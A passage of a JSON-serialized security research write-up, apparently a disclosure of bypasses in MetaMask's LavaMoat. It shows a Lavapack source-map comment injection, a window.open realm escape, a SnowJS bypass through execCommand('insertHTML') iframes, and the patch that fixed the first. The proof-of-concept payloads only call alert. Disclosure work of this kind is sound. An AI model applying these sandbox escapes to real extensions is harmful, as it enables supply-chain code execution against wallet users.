children":55966},{"style":359},[55967],{"type":30,"value":589},{"type":24,"tag":301,"props":55969,"children":55970},{"class":303,"line":495},[55971],{"type":24,"tag":301,"props":55972,"children":55973},{"style":359},[55974],{"type":30,"value":3118},{"type":24,"tag":32,"props":55976,"children":55977},{},[55978,55980,55986],{"type":30,"value":55979},"Looking deeper at the RegEx, it matches the start of the multiple line comment (",{"type":24,"tag":145,"props":55981,"children":55983},{"className":55982},[],[55984],{"type":30,"value":55985},"/*",{"type":30,"value":55987},") but doesn't match the end of it, meaning that the syntax would break in the case of multiline source map comments.",{"type":24,"tag":80,"props":55989,"children":55991},{"id":55990},"the-bypass",[55992],{"type":30,"value":55993},"The Bypass",{"type":24,"tag":32,"props":55995,"children":55996},{},[55997,55999,56004,56006,56011],{"type":30,"value":55998},"By abusing the ",{"type":24,"tag":145,"props":56000,"children":56002},{"className":56001},[],[56003],{"type":30,"value":55504},{"type":30,"value":56005}," function, we could bypass the Lavamoat restrictions by escaping the ",{"type":24,"tag":145,"props":56007,"children":56009},{"className":56008},[],[56010],{"type":30,"value":54850},{"type":30,"value":56012}," sandbox. To do so, we created a multiline source map comment, and injected the invalid javascript inside the comment:",{"type":24,"tag":291,"props":56014,"children":56016},{"className":38119,"code":56015,"language":38121,"meta":7,"style":7},"/*# sourceMappingURL=data:,{}\n\n}}}}\n}, {\n package: \"xpl\",\n file: \"node_modules/xpl/index.js\",\n test: alert(document.domain),\n test1: () => { () => { () => { () => {\n\n/*\n*/\n",[56017],{"type":24,"tag":145,"props":56018,"children":56019},{"__ignoreMap":7},[56020,56028,56035,56043,56051,56059,56067,56075,56083,56090,56098],{"type":24,"tag":301,"props":56021,"children":56022},{"class":303,"line":304},[56023],{"type":24,"tag":301,"props":56024,"children":56025},{"style":1062},[56026],{"type":30,"value":56027},"/*# sourceMappingURL=data:,{}\n",{"type":24,"tag":301,"props":56029,"children":56030},{"class":303,"line":320},[56031],{"type":24,"tag":301,"props":56032,"children":56033},{"emptyLinePlaceholder":16},[56034],{"type":30,"value":341},{"type":24,"tag":301,"props":56036,"children":56037},{"class":303,"line":335},[56038],{"type":24,"tag":301,"props":56039,"children":56040},{"style":1062},[56041],{"type":30,"value":56042},"}}}}\n",{"type":24,"tag":301,"props":56044,"children":56045},{"class":303,"line":344},[56046],{"type":24,"tag":301,"props":56047,"children":56048},{"style":1062},[56049],{"type":30,"value":56050},"}, {\n",{"type":24,"tag":301,"props":56052,"children":56053},{"class":303,"line":401},[56054],{"type":24,"tag":301,"props":56055,"children":56056},{"style":1062},[56057],{"type":30,"value":56058}," package: \"xpl\",\n",{"type":24,"tag":301,"props":56060,"children":56061},{"class":303,"line":415},[56062],{"type":24,"tag":301,"props":56063,"children":56064},{"style":1062},[56065],{"type":30,"value":56066}," file: \"node_modules/xpl/index.js\",\n",{"type":24,"tag":301,"props":56068,"children":56069},{"class":303,"line":439},[56070],{"type":24,"tag":301,"props":56071,"children":56072},{"style":1062},[56073],{"type":30,"value":56074}," test: alert(document.domain),\n",{"type":24,"tag":301,"props":56076,"children":56077},{"class":303,"line":447},[56078],{"type":24,"tag":301,"props":56079,"children":56080},{"style":1062},[56081],{"type":30,"value":56082}," test1: () => { () => { () => { () => {\n",{"type":24,"tag":301,"props":56084,"children":56085},{"class":303,"line":476},[56086],{"type":24,"tag":301,"props":56087,"children":56088},{"emptyLinePlaceholder":16},[56089],{"type":30,"value":341},{"type":24,"tag":301,"props":56091,"children":56092},{"class":303,"line":495},[56093],{"type":24,"tag":301,"props":56094,"children":56095},{"style":1062},[56096],{"type":30,"value":56097},"/*\n",{"type":24,"tag":301,"props":56099,"children":56100},{"class":303,"line":504},[56101],{"type":24,"tag":301,"props":56102,"children":56103},{"style":1062},[56104],{"type":30,"value":56105},"*/\n",{"type":24,"tag":32,"props":56107,"children":56108},{},[56109],{"type":30,"value":56110},"This allows malicious code to execute without breaking any other package or feature. This payload also makes the supply chain attack more impactful. Any injected code is executed as soon as the bundle file is imported.",{"type":24,"tag":80,"props":56112,"children":56114},{"id":56113},"lavapack-patch",[56115],{"type":30,"value":56116},"Lavapack Patch",{"type":24,"tag":32,"props":56118,"children":56119},{},[56120,56122,56128],{"type":30,"value":56121},"Metamask mitigated the issues we reported on Lavapack by defining ",{"type":24,"tag":145,"props":56123,"children":56125},{"className":56124},[],[56126],{"type":30,"value":56127},"assertValidJS",{"type":30,"value":56129},", an independent check that differs from the browserify syntax check we used to exploit the issue.",{"type":24,"tag":32,"props":56131,"children":56132},{},[56133,56135,56142],{"type":30,"value":56134},"The patch was introduced in commit ",{"type":24,"tag":188,"props":56136,"children":56139},{"href":56137,"rel":56138},"https://github.com/LavaMoat/LavaMoat/commit/9c38cd47e7875dde53349dd34971c74ce34004d9",[192],[56140],{"type":30,"value":56141},"9c38cd4",{"type":30,"value":206},{"type":24,"tag":291,"props":56144,"children":56146},{"className":47096,"code":56145,"language":47098,"meta":7,"style":7},"+ function assertValidJS(code) {\n+ try {\n+ new Function(code)\n+ } catch (err) {\n+ throw new Error(`Invalid JavaScript: ${err.message}`)\n+ }\n+ }\n\n+ // additional layer of syntax checking independent of browserify\n+ assertValidJS(sourceMeta.code) \n\n",[56147],{"type":24,"tag":145,"props":56148,"children":56149},{"__ignoreMap":7},[56150,56158,56166,56174,56182,56190,56198,56206,56213,56221],{"type":24,"tag":301,"props":56151,"children":56152},{"class":303,"line":304},[56153],{"type":24,"tag":301,"props":56154,"children":56155},{"style":466},[56156],{"type":30,"value":56157},"+ function assertValidJS(code) {\n",{"type":24,"tag":301,"props":56159,"children":56160},{"class":303,"line":320},[56161],{"type":24,"tag":301,"props":56162,"children":56163},{"style":466},[56164],{"type":30,"value":56165},"+ try {\n",{"type":24,"tag":301,"props":56167,"children":56168},{"class":303,"line":335},[56169],{"type":24,"tag":301,"props":56170,"children":56171},{"style":466},[56172],{"type":30,"value":56173},"+ new Function(code)\n",{"type":24,"tag":301,"props":56175,"children":56176},{"class":303,"line":344},[56177],{"type":24,"tag":301,"props":56178,"children":56179},{"style":466},[56180],{"type":30,"value":56181},"+ } catch (err) {\n",{"type":24,"tag":301,"props":56183,"children":56184},{"class":303,"line":401},[56185],{"type":24,"tag":301,"props":56186,"children":56187},{"style":466},[56188],{"type":30,"value":56189},"+ throw new Error(`Invalid JavaScript: ${err.message}`)\n",{"type":24,"tag":301,"props":56191,"children":56192},{"class":303,"line":415},[56193],{"type":24,"tag":301,"props":56194,"children":56195},{"style":466},[56196],{"type":30,"value":56197},"+ }\n",{"type":24,"tag":301,"props":56199,"children":56200},{"class":303,"line":439},[56201],{"type":24,"tag":301,"props":56202,"children":56203},{"style":466},[56204],{"type":30,"value":56205},"+ }\n",{"type":24,"tag":301,"props":56207,"children":56208},{"class":303,"line":447},[56209],{"type":24,"tag":301,"props":56210,"children":56211},{"emptyLinePlaceholder":16},[56212],{"type":30,"value":341},{"type":24,"tag":301,"props":56214,"children":56215},{"class":303,"line":476},[56216],{"type":24,"tag":301,"props":56217,"children":56218},{"style":466},[56219],{"type":30,"value":56220},"+ // additional layer of syntax checking independent of browserify\n",{"type":24,"tag":301,"props":56222,"children":56223},{"class":303,"line":495},[56224],{"type":24,"tag":301,"props":56225,"children":56226},{"style":466},[56227],{"type":30,"value":56228},"+ assertValidJS(sourceMeta.code)\n",{"type":24,"tag":43,"props":56230,"children":56232},{"id":56231},"hacking-js-realms",[56233],{"type":30,"value":56234},"Hacking JS Realms",{"type":24,"tag":32,"props":56236,"children":56237},{},[56238,56240,56245],{"type":30,"value":56239},"Lavamoat scuttling removes unnecessary and dangerous attributes from the ",{"type":24,"tag":145,"props":56241,"children":56243},{"className":56242},[],[56244],{"type":30,"value":44157},{"type":30,"value":56246}," object. However, this can be easily bypassed when Lavamoat is running in a browser context.",{"type":24,"tag":291,"props":56248,"children":56250},{"className":38119,"code":56249,"language":38121,"meta":7,"style":7},"const w = window.open('/non_existent');\nw.alert(document.domain)\n",[56251],{"type":24,"tag":145,"props":56252,"children":56253},{"__ignoreMap":7},[56254,56296],{"type":24,"tag":301,"props":56255,"children":56256},{"class":303,"line":304},[56257,56261,56266,56270,56274,56278,56283,56287,56292],{"type":24,"tag":301,"props":56258,"children":56259},{"style":348},[56260],{"type":30,"value":16460},{"type":24,"tag":301,"props":56262,"children":56263},{"style":369},[56264],{"type":30,"value":56265}," w",{"type":24,"tag":301,"props":56267,"children":56268},{"style":385},[56269],{"type":30,"value":2537},{"type":24,"tag":301,"props":56271,"children":56272},{"style":369},[56273],{"type":30,"value":38163},{"type":24,"tag":301,"props":56275,"children":56276},{"style":359},[56277],{"type":30,"value":206},{"type":24,"tag":301,"props":56279,"children":56280},{"style":314},[56281],{"type":30,"value":56282},"open",{"type":24,"tag":301,"props":56284,"children":56285},{"style":359},[56286],{"type":30,"value":362},{"type":24,"tag":301,"props":56288,"children":56289},{"style":329},[56290],{"type":30,"value":56291},"'/non_existent'",{"type":24,"tag":301,"props":56293,"children":56294},{"style":359},[56295],{"type":30,"value":589},{"type":24,"tag":301,"props":56297,"children":56298},{"class":303,"line":320},[56299,56303,56307,56311,56315,56319,56323,56327],{"type":24,"tag":301,"props":56300,"children":56301},{"style":369},[56302],{"type":30,"value":2580},{"type":24,"tag":301,"props":56304,"children":56305},{"style":359},[56306],{"type":30,"value":206},{"type":24,"tag":301,"props":56308,"children":56309},{"style":314},[56310],{"type":30,"value":39448},{"type":24,"tag":301,"props":56312,"children":56313},{"style":359},[56314],{"type":30,"value":362},{"type":24,"tag":301,"props":56316,"children":56317},{"style":369},[56318],{"type":30,"value":39458},{"type":24,"tag":301,"props":56320,"children":56321},{"style":359},[56322],{"type":30,"value":206},{"type":24,"tag":301,"props":56324,"children":56325},{"style":369},[56326],{"type":30,"value":39468},{"type":24,"tag":301,"props":56328,"children":56329},{"style":359},[56330],{"type":30,"value":791},{"type":24,"tag":32,"props":56332,"children":56333},{},[56334,56336,56341],{"type":30,"value":56335},"This opens a new window with a new JS Realm (another ",{"type":24,"tag":145,"props":56337,"children":56339},{"className":56338},[],[56340],{"type":30,"value":44157},{"type":30,"value":56342}," object), and uses it to execute code in the context of the scuttled window. Note that the window needs to be same-origin and must not be scuttled.",{"type":24,"tag":32,"props":56344,"children":56345},{},[56346,56348,56355],{"type":30,"value":56347},"As a mitigation, some applications integrate SnowJS with scuttling, so every new same-origin window and iframe will be detected and scuttled (check the ",{"type":24,"tag":188,"props":56349,"children":56352},{"href":56350,"rel":56351},"https://github.com/MetaMask/metamask-extension/blob/3996f505a6a156d96077acb49579e6fc9e78cd45/app/scripts/use-snow.js#L22",[192],[56353],{"type":30,"value":56354},"Metamask implementation",{"type":30,"value":9961},{"type":24,"tag":80,"props":56357,"children":56359},{"id":56358},"snowjs-attack-surface",[56360],{"type":30,"value":56361},"SnowJS Attack Surface",{"type":24,"tag":32,"props":56363,"children":56364},{},[56365],{"type":30,"value":56366},"SnowJS is a javascript sandbox implementation that secures same-origin realms in browser applications. It is configured to detect new realms and attach them to the sandbox.",{"type":24,"tag":32,"props":56368,"children":56369},{},[56370,56372,56379],{"type":30,"value":56371},"As a mechanism, it hooks functions that can be used to create realms (an iframe, for example). For example, here are some of the ",{"type":24,"tag":188,"props":56373,"children":56376},{"href":56374,"rel":56375},"https://github.com/LavaMoat/snow/blob/ecf1add05c774b90b8baeff934b2e40585e13ca4/src/inserters.js#L9",[192],[56377],{"type":30,"value":56378},"hooked inserters",{"type":30,"value":56380}," functions:",{"type":24,"tag":291,"props":56382,"children":56384},{"className":38119,"code":56383,"language":38121,"meta":7,"style":7},"const map = {\n Range: ['insertNode'],\n DocumentFragment: ['replaceChildren', 'append', 'prepend'],\n Document: ['replaceChildren', 'append', 'prepend', 'write', 'writeln'],\n Node: ['appendChild', 'insertBefore', 'replaceChild'],\n Element: ['innerHTML', 'outerHTML', 'insertAdjacentHTML', 'replaceWith', 'insertAdjacentElement', 'append', 'before', 'prepend', 'after', 'replaceChildren'],\n ShadowRoot: ['innerHTML'],\n HTMLIFrameElement: ['srcdoc'],\n};\n",[56385],{"type":24,"tag":145,"props":56386,"children":56387},{"__ignoreMap":7},[56388,56408,56429,56468,56522,56561,56660,56680,56701],{"type":24,"tag":301,"props":56389,"children":56390},{"class":303,"line":304},[56391,56395,56400,56404],{"type":24,"tag":301,"props":56392,"children":56393},{"style":348},[56394],{"type":30,"value":16460},{"type":24,"tag":301,"props":56396,"children":56397},{"style":369},[56398],{"type":30,"value":56399}," map",{"type":24,"tag":301,"props":56401,"children":56402},{"style":385},[56403],{"type":30,"value":2537},{"type":24,"tag":301,"props":56405,"children":56406},{"style":359},[56407],{"type":30,"value":3035},{"type":24,"tag":301,"props":56409,"children":56410},{"class":303,"line":320},[56411,56416,56420,56425],{"type":24,"tag":301,"props":56412,"children":56413},{"style":369},[56414],{"type":30,"value":56415}," Range:",{"type":24,"tag":301,"props":56417,"children":56418},{"style":359},[56419],{"type":30,"value":29800},{"type":24,"tag":301,"props":56421,"children":56422},{"style":329},[56423],{"type":30,"value":56424},"'insertNode'",{"type":24,"tag":301,"props":56426,"children":56427},{"style":359},[56428],{"type":30,"value":21055},{"type":24,"tag":301,"props":56430,"children":56431},{"class":303,"line":335},[56432,56437,56441,56446,56450,56455,56459,56464],{"type":24,"tag":301,"props":56433,"children":56434},{"style":369},[56435],{"type":30,"value":56436}," DocumentFragment:",{"type":24,"tag":301,"props":56438,"children":56439},{"style":359},[56440],{"type":30,"value":29800},{"type":24,"tag":301,"props":56442,"children":56443},{"style":329},[56444],{"type":30,"value":56445},"'replaceChildren'",{"type":24,"tag":301,"props":56447,"children":56448},{"style":359},[56449],{"type":30,"value":377},{"type":24,"tag":301,"props":56451,"children":56452},{"style":329},[56453],{"type":30,"value":56454},"'append'",{"type":24,"tag":301,"props":56456,"children":56457},{"style":359},[56458],{"type":30,"value":377},{"type":24,"tag":301,"props":56460,"children":56461},{"style":329},[56462],{"type":30,"value":56463},"'prepend'",{"type":24,"tag":301,"props":56465,"children":56466},{"style":359},[56467],{"type":30,"value":21055},{"type":24,"tag":301,"props":56469,"children":56470},{"class":303,"line":344},[56471,56476,56480,56484,56488,56492,56496,56500,56504,56509,56513,56518],{"type":24,"tag":301,"props":56472,"children":56473},{"style":369},[56474],{"type":30,"value":56475}," Document:",{"type":24,"tag":301,"props":56477,"children":56478},{"style":359},[56479],{"type":30,"value":29800},{"type":24,"tag":301,"props":56481,"children":56482},{"style":329},[56483],{"type":30,"value":56445},{"type":24,"tag":301,"props":56485,"children":56486},{"style":359},[56487],{"type":30,"value":377},{"type":24,"tag":301,"props":56489,"children":56490},{"style":329},[56491],{"type":30,"value":56454},{"type":24,"tag":301,"props":56493,"children":56494},{"style":359},[56495],{"type":30,"value":377},{"type":24,"tag":301,"props":56497,"children":56498},{"style":329},[56499],{"type":30,"value":56463},{"type":24,"tag":301,"props":56501,"children":56502},{"style":359},[56503],{"type":30,"value":377},{"type":24,"tag":301,"props":56505,"children":56506},{"style":329},[56507],{"type":30,"value":56508},"'write'",{"type":24,"tag":301,"props":56510,"children":56511},{"style":359},[56512],{"type":30,"value":377},{"type":24,"tag":301,"props":56514,"children":56515},{"style":329},[56516],{"type":30,"value":56517},"'writeln'",{"type":24,"tag":301,"props":56519,"children":56520},{"style":359},[56521],{"type":30,"value":21055},{"type":24,"tag":301,"props":56523,"children":56524},{"class":303,"line":401},[56525,56530,56534,56539,56543,56548,56552,56557],{"type":24,"tag":301,"props":56526,"children":56527},{"style":369},[56528],{"type":30,"value":56529}," Node:",{"type":24,"tag":301,"props":56531,"children":56532},{"style":359},[56533],{"type":30,"value":29800},{"type":24,"tag":301,"props":56535,"children":56536},{"style":329},[56537],{"type":30,"value":56538},"'appendChild'",{"type":24,"tag":301,"props":56540,"children":56541},{"style":359},[56542],{"type":30,"value":377},{"type":24,"tag":301,"props":56544,"children":56545},{"style":329},[56546],{"type":30,"value":56547},"'insertBefore'",{"type":24,"tag":301,"props":56549,"children":56550},{"style":359},[56551],{"type":30,"value":377},{"type":24,"tag":301,"props":56553,"children":56554},{"style":329},[56555],{"type":30,"value":56556},"'replaceChild'",{"type":24,"tag":301,"props":56558,"children":56559},{"style":359},[56560],{"type":30,"value":21055},{"type":24,"tag":301,"props":56562,"children":56563},{"class":303,"line":415},[56564,56569,56573,56578,56582,56587,56591,56596,56600,56605,56609,56614,56618,56622,56626,56631,56635,56639,56643,56648,56652,56656],{"type":24,"tag":301,"props":56565,"children":56566},{"style":369},[56567],{"type":30,"value":56568}," Element:",{"type":24,"tag":301,"props":56570,"children":56571},{"style":359},[56572],{"type":30,"value":29800},{"type":24,"tag":301,"props":56574,"children":56575},{"style":329},[56576],{"type":30,"value":56577},"'innerHTML'",{"type":24,"tag":301,"props":56579,"children":56580},{"style":359},[56581],{"type":30,"value":377},{"type":24,"tag":301,"props":56583,"children":56584},{"style":329},[56585],{"type":30,"value":56586},"'outerHTML'",{"type":24,"tag":301,"props":56588,"children":56589},{"style":359},[56590],{"type":30,"value":377},{"type":24,"tag":301,"props":56592,"children":56593},{"style":329},[56594],{"type":30,"value":56595},"'insertAdjacentHTML'",{"type":24,"tag":301,"props":56597,"children":56598},{"style":359},[56599],{"type":30,"value":377},{"type":24,"tag":301,"props":56601,"children":56602},{"style":329},[56603],{"type":30,"value":56604},"'replaceWith'",{"type":24,"tag":301,"props":56606,"children":56607},{"style":359},[56608],{"type":30,"value":377},{"type":24,"tag":301,"props":56610,"children":56611},{"style":329},[56612],{"type":30,"value":56613},"'insertAdjacentElement'",{"type":24,"tag":301,"props":56615,"children":56616},{"style":359},[56617],{"type":30,"value":377},{"type":24,"tag":301,"props":56619,"children":56620},{"style":329},[56621],{"type":30,"value":56454},{"type":24,"tag":301,"props":56623,"children":56624},{"style":359},[56625],{"type":30,"value":377},{"type":24,"tag":301,"props":56627,"children":56628},{"style":329},[56629],{"type":30,"value":56630},"'before'",{"type":24,"tag":301,"props":56632,"children":56633},{"style":359},[56634],{"type":30,"value":377},{"type":24,"tag":301,"props":56636,"children":56637},{"style":329},[56638],{"type":30,"value":56463},{"type":24,"tag":301,"props":56640,"children":56641},{"style":359},[56642],{"type":30,"value":377},{"type":24,"tag":301,"props":56644,"children":56645},{"style":329},[56646],{"type":30,"value":56647},"'after'",{"type":24,"tag":301,"props":56649,"children":56650},{"style":359},[56651],{"type":30,"value":377},{"type":24,"tag":301,"props":56653,"children":56654},{"style":329},[56655],{"type":30,"value":56445},{"type":24,"tag":301,"props":56657,"children":56658},{"style":359},[56659],{"type":30,"value":21055},{"type":24,"tag":301,"props":56661,"children":56662},{"class":303,"line":439},[56663,56668,56672,56676],{"type":24,"tag":301,"props":56664,"children":56665},{"style":369},[56666],{"type":30,"value":56667}," ShadowRoot:",{"type":24,"tag":301,"props":56669,"children":56670},{"style":359},[56671],{"type":30,"value":29800},{"type":24,"tag":301,"props":56673,"children":56674},{"style":329},[56675],{"type":30,"value":56577},{"type":24,"tag":301,"props":56677,"children":56678},{"style":359},[56679],{"type":30,"value":21055},{"type":24,"tag":301,"props":56681,"children":56682},{"class":303,"line":447},[56683,56688,56692,56697],{"type":24,"tag":301,"props":56684,"children":56685},{"style":369},[56686],{"type":30,"value":56687}," HTMLIFrameElement:",{"type":24,"tag":301,"props":56689,"children":56690},{"style":359},[56691],{"type":30,"value":29800},{"type":24,"tag":301,"props":56693,"children":56694},{"style":329},[56695],{"type":30,"value":56696},"'srcdoc'",{"type":24,"tag":301,"props":56698,"children":56699},{"style":359},[56700],{"type":30,"value":21055},{"type":24,"tag":301,"props":56702,"children":56703},{"class":303,"line":476},[56704],{"type":24,"tag":301,"props":56705,"children":56706},{"style":359},[56707],{"type":30,"value":3118},{"type":24,"tag":32,"props":56709,"children":56710},{},[56711],{"type":30,"value":56712},"This means that an attacker can't use any of these functions to create an iframe and bypass the snowJS sandbox, because it will detect the new frame and include it in the sandbox.",{"type":24,"tag":32,"props":56714,"children":56715},{},[56716],{"type":30,"value":56717},"Unfortunately, client-side javascript is surprisingly complex with lots of strange behaviours that could be used to bypass the hook security feature.",{"type":24,"tag":80,"props":56719,"children":56721},{"id":56720},"bypassing-snowjs",[56722],{"type":30,"value":56723},"Bypassing SnowJS",{"type":24,"tag":32,"props":56725,"children":56726},{},[56727,56729,56740,56742,56748],{"type":30,"value":56728},"The deprecated ",{"type":24,"tag":188,"props":56730,"children":56733},{"href":56731,"rel":56732},"https://developer.mozilla.org/en-US/docs/Web/API/Document/execCommand",[192],[56734],{"type":24,"tag":145,"props":56735,"children":56737},{"className":56736},[],[56738],{"type":30,"value":56739},"document.execCommand",{"type":30,"value":56741}," function is used to execute commands inside a ",{"type":24,"tag":145,"props":56743,"children":56745},{"className":56744},[],[56746],{"type":30,"value":56747},"contenteditable",{"type":30,"value":56749}," focused context. Despite this being a deprecated function, it is still supported by modern browsers.",{"type":24,"tag":291,"props":56751,"children":56754},{"className":56752,"code":56753,"language":39133,"meta":7,"style":7},"language-html shiki shiki-themes slack-dark","\u003Cdiv id=test contenteditable autofocus>\u003C/div>\n",[56755],{"type":24,"tag":145,"props":56756,"children":56757},{"__ignoreMap":7},[56758],{"type":24,"tag":301,"props":56759,"children":56760},{"class":303,"line":304},[56761,56765,56769,56773,56777,56782,56787,56792,56797,56801],{"type":24,"tag":301,"props":56762,"children":56763},{"style":39126},[56764],{"type":30,"value":1849},{"type":24,"tag":301,"props":56766,"children":56767},{"style":348},[56768],{"type":30,"value":38102},{"type":24,"tag":301,"props":56770,"children":56771},{"style":369},[56772],{"type":30,"value":39206},{"type":24,"tag":301,"props":56774,"children":56775},{"style":359},[56776],{"type":30,"value":523},{"type":24,"tag":301,"props":56778,"children":56779},{"style":329},[56780],{"type":30,"value":56781},"test",{"type":24,"tag":301,"props":56783,"children":56784},{"style":369},[56785],{"type":30,"value":56786}," contenteditable",{"type":24,"tag":301,"props":56788,"children":56789},{"style":369},[56790],{"type":30,"value":56791}," autofocus",{"type":24,"tag":301,"props":56793,"children":56794},{"style":39126},[56795],{"type":30,"value":56796},">\u003C/",{"type":24,"tag":301,"props":56798,"children":56799},{"style":348},[56800],{"type":30,"value":38102},{"type":24,"tag":301,"props":56802,"children":56803},{"style":39126},[56804],{"type":30,"value":12812},{"type":24,"tag":32,"props":56806,"children":56807},{},[56808,56810,56816,56818,56823],{"type":30,"value":56809},"After inserting this element to a page, it is possible to use ",{"type":24,"tag":145,"props":56811,"children":56813},{"className":56812},[],[56814],{"type":30,"value":56815},"insertHTML",{"type":30,"value":56817}," command of ",{"type":24,"tag":145,"props":56819,"children":56821},{"className":56820},[],[56822],{"type":30,"value":56739},{"type":30,"value":56824}," to add a non-sandboxed iframe.",{"type":24,"tag":291,"props":56826,"children":56828},{"className":38119,"code":56827,"language":38121,"meta":7,"style":7},"document.execCommand('insertHTML', false, '\u003Ciframe srcdoc=\"aaa\">');\n",[56829],{"type":24,"tag":145,"props":56830,"children":56831},{"__ignoreMap":7},[56832],{"type":24,"tag":301,"props":56833,"children":56834},{"class":303,"line":304},[56835,56839,56843,56848,56852,56857,56861,56865,56869,56874],{"type":24,"tag":301,"props":56836,"children":56837},{"style":369},[56838],{"type":30,"value":39458},{"type":24,"tag":301,"props":56840,"children":56841},{"style":359},[56842],{"type":30,"value":206},{"type":24,"tag":301,"props":56844,"children":56845},{"style":314},[56846],{"type":30,"value":56847},"execCommand",{"type":24,"tag":301,"props":56849,"children":56850},{"style":359},[56851],{"type":30,"value":362},{"type":24,"tag":301,"props":56853,"children":56854},{"style":329},[56855],{"type":30,"value":56856},"'insertHTML'",{"type":24,"tag":301,"props":56858,"children":56859},{"style":359},[56860],{"type":30,"value":377},{"type":24,"tag":301,"props":56862,"children":56863},{"style":348},[56864],{"type":30,"value":14990},{"type":24,"tag":301,"props":56866,"children":56867},{"style":359},[56868],{"type":30,"value":377},{"type":24,"tag":301,"props":56870,"children":56871},{"style":329},[56872],{"type":30,"value":56873},"'\u003Ciframe srcdoc=\"aaa\">'",{"type":24,"tag":301,"props":56875,"children":56876},{"style":359},[56877],{"type":30,"value":589},{"type":24,"tag":80,"props":56879,"children":56881},{"id":56880},"impact-on-lavamoat-scuttling",[56882],{"type":30,"value":56883},"Impact On Lavamoat Scuttling",{"type":24,"tag":32,"props":56885,"children":56886},{},[56887],{"type":30,"value":56888},"As it is recommended to use snowJS integrated with Lavamoat scuttling to prevent bypasses, it is possible to completely bypass the scuttling feature without pre-conditions.",{"type":24,"tag":32,"props":56890,"children":56891},{},[56892,56894,56899,56901,56906],{"type":30,"value":56893},"For the exploit, the only used functions are in ",{"type":24,"tag":145,"props":56895,"children":56897},{"className":56896},[],[56898],{"type":30,"value":39458},{"type":30,"value":56900}," object, which can never be scuttled once it is a non-writable and non-configurable property in ",{"type":24,"tag":145,"props":56902,"children":56904},{"className":56903},[],[56905],{"type":30,"value":44157},{"type":30,"value":56907}," object.",{"type":24,"tag":32,"props":56909,"children":56910},{},[56911,56913,56918],{"type":30,"value":56912},"Consider this example, which runs a scuttled ",{"type":24,"tag":145,"props":56914,"children":56916},{"className":56915},[],[56917],{"type":30,"value":39448},{"type":30,"value":32224},{"type":24,"tag":291,"props":56920,"children":56922},{"className":38119,"code":56921,"language":38121,"meta":7,"style":7},"document.body.innerHTML = \"\u003Cdiv id=test contenteditable autofocus>\u003C/div>\";\ndocument.getElementById('test').focus();\ndocument.execCommand('insertHTML', false, '\u003Ciframe srcdoc=\"aaa\">');\ndocument.getElementsByTagName('iframe')[0].contentWindow.alert(document.domain);\n",[56923],{"type":24,"tag":145,"props":56924,"children":56925},{"__ignoreMap":7},[56926,56962,56999,57042],{"type":24,"tag":301,"props":56927,"children":56928},{"class":303,"line":304},[56929,56933,56937,56941,56945,56949,56953,56958],{"type":24,"tag":301,"props":56930,"children":56931},{"style":369},[56932],{"type":30,"value":39458},{"type":24,"tag":301,"props":56934,"children":56935},{"style":359},[56936],{"type":30,"value":206},{"type":24,"tag":301,"props":56938,"children":56939},{"style":369},[56940],{"type":30,"value":39150},{"type":24,"tag":301,"props":56942,"children":56943},{"style":359},[56944],{"type":30,"value":206},{"type":24,"tag":301,"props":56946,"children":56947},{"style":369},[56948],{"type":30,"value":41720},{"type":24,"tag":301,"props":56950,"children":56951},{"style":385},[56952],{"type":30,"value":2537},{"type":24,"tag":301,"props":56954,"children":56955},{"style":329},[56956],{"type":30,"value":56957}," \"\u003Cdiv id=test contenteditable autofocus>\u003C/div>\"",{"type":24,"tag":301,"props":56959,"children":56960},{"style":359},[56961],{"type":30,"value":492},{"type":24,"tag":301,"props":56963,"children":56964},{"class":303,"line":320},[56965,56969,56973,56977,56981,56986,56990,56995],{"type":24,"tag":301,"props":56966,"children":56967},{"style":369},[56968],{"type":30,"value":39458},{"type":24,"tag":301,"props":56970,"children":56971},{"style":359},[56972],{"type":30,"value":206},{"type":24,"tag":301,"props":56974,"children":56975},{"style":314},[56976],{"type":30,"value":41745},{"type":24,"tag":301,"props":56978,"children":56979},{"style":359},[56980],{"type":30,"value":362},{"type":24,"tag":301,"props":56982,"children":56983},{"style":329},[56984],{"type":30,"value":56985},"'test'",{"type":24,"tag":301,"props":56987,"children":56988},{"style":359},[56989],{"type":30,"value":27511},{"type":24,"tag":301,"props":56991,"children":56992},{"style":314},[56993],{"type":30,"value":56994},"focus",{"type":24,"tag":301,"props":56996,"children":56997},{"style":359},[56998],{"type":30,"value":4859},{"type":24,"tag":301,"props":57000,"children":57001},{"class":303,"line":335},[57002,57006,57010,57014,57018,57022,57026,57030,57034,57038],{"type":24,"tag":301,"props":57003,"children":57004},{"style":369},[57005],{"type":30,"value":39458},{"type":24,"tag":301,"props":57007,"children":57008},{"style":359},[57009],{"type":30,"value":206},{"type":24,"tag":301,"props":57011,"children":57012},{"style":314},[57013],{"type":30,"value":56847},{"type":24,"tag":301,"props":57015,"children":57016},{"style":359},[57017],{"type":30,"value":362},{"type":24,"tag":301,"props":57019,"children":57020},{"style":329},[57021],{"type":30,"value":56856},{"type":24,"tag":301,"props":57023,"children":57024},{"style":359},[57025],{"type":30,"value":377},{"type":24,"tag":301,"props":57027,"children":57028},{"style":348},[57029],{"type":30,"value":14990},{"type":24,"tag":301,"props":57031,"children":57032},{"style":359},[57033],{"type":30,"value":377},{"type":24,"tag":301,"props":57035,"children":57036},{"style":329},[57037],{"type":30,"value":56873},{"type":24,"tag":301,"props":57039,"children":57040},{"style":359},[57041],{"type":30,"value":589},{"type":24,"tag":301,"props":57043,"children":57044},{"class":303,"line":344},[57045,57049,57053,57058,57062,57066,57071,57075,57080,57085,57089,57093,57097,57101,57105,57109],{"type":24,"tag":301,"props":57046,"children":57047},{"style":369},[57048],{"type":30,"value":39458},{"type":24,"tag":301,"props":57050,"children":57051},{"style":359},[57052],{"type":30,"value":206},{"type":24,"tag":301,"props":57054,"children":57055},{"style":314},[57056],{"type":30,"value":57057},"getElementsByTagName",{"type":24,"tag":301,"props":57059,"children":57060},{"style":359},[57061],{"type":30,"value":362},{"type":24,"tag":301,"props":57063,"children":57064},{"style":329},[57065],{"type":30,"value":43472},{"type":24,"tag":301,"props":57067,"children":57068},{"style":359},[57069],{"type":30,"value":57070},")[",{"type":24,"tag":301,"props":57072,"children":57073},{"style":466},[57074],{"type":30,"value":584},{"type":24,"tag":301,"props":57076,"children":57077},{"style":359},[57078],{"type":30,"value":57079},"].",{"type":24,"tag":301,"props":57081,"children":57082},{"style":369},[57083],{"type":30,"value":57084},"contentWindow",{"type":24,"tag":301,"props":57086,"children":57087},{"style":359},[57088],{"type":30,"value":206},{"type":24,"tag":301,"props":57090,"children":57091},{"style":314},[57092],{"type":30,"value":39448},{"type":24,"tag":301,"props":57094,"children":57095},{"style":359},[57096],{"type":30,"value":362},{"type":24,"tag":301,"props":5